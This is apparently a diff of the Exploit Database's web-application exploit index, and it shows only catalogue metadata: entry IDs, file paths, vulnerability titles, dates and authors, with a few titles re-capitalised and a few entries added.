 31669,exploits/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",webapps,php,
 31670,exploits/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",webapps,php,
 31671,exploits/php/webapps/31671.html,"TorrentFlux 2.3 - 'admin.php' Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",webapps,php,
-31672,exploits/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,php,
+31672,exploits/php/webapps/31672.txt,"μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,php,
 31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,
 31674,exploits/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,webapps,php,
 31676,exploits/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,webapps,php,
@@ -36328,8 +36340,8 @@ id,file,description,date,author,type,platform,port
 38174,exploits/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,webapps,multiple,
 38176,exploits/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",webapps,php,
 38182,exploits/php/webapps/38182.txt,"tinybrowser - 'type' Cross-Site Scripting",2013-01-09,MustLive,webapps,php,
-38183,exploits/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,webapps,php,
-38184,exploits/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,webapps,php,
+38183,exploits/php/webapps/38183.txt,"TinyBrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,webapps,php,
+38184,exploits/php/webapps/38184.txt,"TinyBrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,webapps,php,
 38187,exploits/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",webapps,php,80
 38188,exploits/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,webapps,jsp,80
 38189,exploits/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,webapps,jsp,
@@ -37004,7 +37016,7 @@ id,file,description,date,author,type,platform,port
 39580,exploits/php/webapps/39580.txt,"Disc ORGanizer (DORG) - Multiple Vulnerabilities",2016-03-21,SECUPENT,webapps,php,80
 39581,exploits/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",webapps,hardware,80
 39582,exploits/php/webapps/39582.txt,"Xoops 2.5.7.2 - Cross-Site Request Forgery (Arbitrary User Deletions)",2016-03-21,hyp3rlinx,webapps,php,80
-39583,exploits/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,webapps,php,80
+39583,exploits/php/webapps/39583.txt,"XOOPS 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,webapps,php,80
 39584,exploits/php/webapps/39584.txt,"WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,webapps,php,80
 39586,exploits/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80
 39587,exploits/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80
@@ -38025,6 +38037,7 @@ id,file,description,date,author,type,platform,port
 43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
+43404,exploits/multiple/webapps/43404.py,"SAP BusinessObjects launch pad - Server-Side Request Forgery",2017-12-27,"Ahmad Mahfouz",webapps,multiple,
 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
 43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php,
 43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215
@@ -38965,6 +38978,7 @@ id,file,description,date,author,type,platform,port
 44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
+44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
 44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
@@ -38972,3 +38986,4 @@ id,file,description,date,author,type,platform,port
 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
 44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
 44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
+44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,